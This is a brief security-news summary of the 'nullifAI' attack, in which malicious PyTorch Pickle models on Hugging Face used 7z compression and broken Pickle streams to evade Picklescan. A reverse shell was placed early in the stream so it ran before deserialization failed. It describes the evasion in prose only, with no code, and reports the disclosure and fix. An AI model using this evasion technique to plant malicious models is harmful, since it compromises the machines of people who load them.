The nullifAI attack exploits Pickle file serialization, an insecure method for storing ML models, to distribute malware-laced PyTorch models on Hugging Face. Instead of using PyTorch’s default ZIP compression, the attackers compressed the models using 7z, preventing automatic loading via torch.load()
and evading Picklescan detection. The malicious payload, a reverse shell, was embedded at the beginning of the Pickle stream, ensuring it executed before the deserialization process encountered an error. Once triggered, the payload established a remote connection to a hardcoded IP address, giving attackers unauthorized access to the compromised system.
The security flaw in Picklescan lies in its blacklist-based detection, which can be bypassed using alternative execution methods. Furthermore, Picklescan fails to properly scan broken Pickle files, meaning that malware can execute before detection occurs. After responsible disclosure, Hugging Face removed the malicious models within 24 hours and improved Picklescan’s detection capabilities to better handle threats.